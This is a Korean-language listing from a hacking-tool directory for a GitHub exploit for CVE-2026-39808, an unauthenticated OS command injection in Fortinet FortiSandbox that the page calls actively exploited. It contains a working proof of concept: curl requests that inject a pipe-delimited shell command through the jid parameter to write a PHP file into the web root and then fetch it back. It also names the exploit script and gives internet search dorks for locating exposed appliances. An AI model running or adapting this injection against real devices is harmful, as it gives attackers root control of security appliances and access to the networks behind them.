Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-39808 — Fortinet FortiSandbox 4.4.0-4.4.8 - tracer-behavior Endpoint를 통한 OS 명령 주입 | Kitploit
도구/GitHubGitHub/error-inside/cve-2026-39808
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & Education
GitHuberror-inside/cve-2026-39808

CVE-2026-39808

Fortinet FortiSandbox 4.4.0-4.4.8 - tracer-behavior Endpoint를 통한 OS 명령 주입

저장소 보기
152개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-39808

Python CVSS License Educational

Fortinet FortiSandbox 4.4.0-4.4.8 - tracer-behavior Endpoint를 통한 OS 명령 주입

Fortinet FortiSandbox는 의심스러운 파일, URL 및 네트워크 트래픽을 악성 행위에 대해 분석하기 위해 격리된 환경을 생성하는 고급 위협 방어 솔루션입니다. 정적 분석, 동적 분석, AI 기반 머신러닝, FortiGuard의 위협 인텔리전스를 결합하여 기존 시그니처 기반 방어를 우회하는 제로데이 위협, 회피형 멀웨어, 랜섬웨어, 표적 공격을 탐지합니다. 기업은 신흥 위협(특히 알려지지 않은 멀웨어 및 지능형 지속 위협(APT))으로부터 보호하기 위해 FortiSandbox를 배포해야 합니다. 의심스러운 콘텐츠가 프로덕션 시스템에 도달하기 전에 안전한 격리 환경에서 자동으로 실행(detonate)됩니다. 광범위한 Fortinet Security Fabric과 통합되며, 다양한 네트워크 아키텍처에 맞게 물리적 어플라이언스, 가상 머신, 클라우드 서비스 또는 컨테이너화된 솔루션으로 배포할 수 있습니다.

CVE-2026-39808은 FortiSandbox 버전 4.4.0부터 4.4.8까지 영향을 미치는 심각한 OS 명령 주입 취약점입니다. 이 결함은 사용자 제어 입력이 OS 명령 구성에 사용되기 전에 특수 요소를 적절히 무력화하지 못하는 데서 비롯되며(CWE-78), 특히 지정되지 않은 API 엔드포인트에 영향을 미칩니다. 인증되지 않은 공격자는 특수하게 조작된 HTTP 요청을 전송하여 기본 시스템에서 루트 권한으로 임의의 운영 체제 명령을 실행할 수 있습니다. 성공적인 익스플로잇은 공격자에게 FortiSandbox 어플라이언스에 대한 완전한 제어권을 부여하여 분석된 멀웨어 샘플에 접근하고, 민감한 구성 데이터를 유출하며, 연결된 네트워크 세그먼트로 피벗하거나, 손상된 장치를 기업 환경 내 추가 측면 이동을 위한 발판으로 사용할 수 있게 합니다. 이 취약점은 현재 실제 환경에서 활발히 악용되고 있습니다.

PoC

root@kitploit:~
# Step 1 — inject: write a marker string to a temp .php file via pipe in jid param
# Decoded payload: |(echo canary > /web/ng/proof.php)|
curl -sk -o /dev/null -w "%{http_code}" \
  "http://example.com/fortisandbox/job-detail/tracer-behavior?jid=%7c%28echo+canary+%3e+%2fweb%2fng%2fproof.php%29%7c" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Connection: close"

# Step 2 — verify: fetch the dropped file and check for the marker
curl -sk "http://example.com/ng/proof.php" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Connection: close"

사용법

root@kitploit:~
python CVE-2026-39808-X7.py
  • Zern : title:FortiSandbox
  • Fofa : title="FortiSandbox"
  • Shodan : http.title:FortiSandbox

리소스

  • OpenCVE - CVE-2026-39808 - FortiSandbox 4.4.x 릴리스의 OS 명령 주입
  • NIST - CVE-2026-39808 상세 정보
  • Fortinet FortiSandbox

면책 조항

이 저장소와 그 내용은 엄격히 합법적인 보안 연구, 승인된 침투 테스트, 교육 연구 및 방어 목적으로 제공됩니다. 이 자료에 접근하거나 사용함으로써 귀하는 모든 관련 법률을 준수하고 귀하가 소유하지 않은 시스템에 대해 테스트하거나 이러한 기술을 적용하기 전에 적절한 권한을 얻었음을 전적으로 인정합니다.

이 프로젝트의 저자와 관리자는 이 정보의 사용으로 인한 손해, 법적 결과 또는 오용에 대해 어떠한 책임도 지지 않습니다. 승인되지 않은 접근, 악의적인 활동 또는 불법 목적을 위한 사용은 명시적으로 금지되며 지원되지 않습니다.

책임감 있게 사용하세요. 합법을 유지하세요. 자신이 소유하거나 명시적 서면 허가를 받은 시스템만 테스트하세요.

저자

  • ErrorInside // SCT

라이선스

SCT-PL

도구 다운로드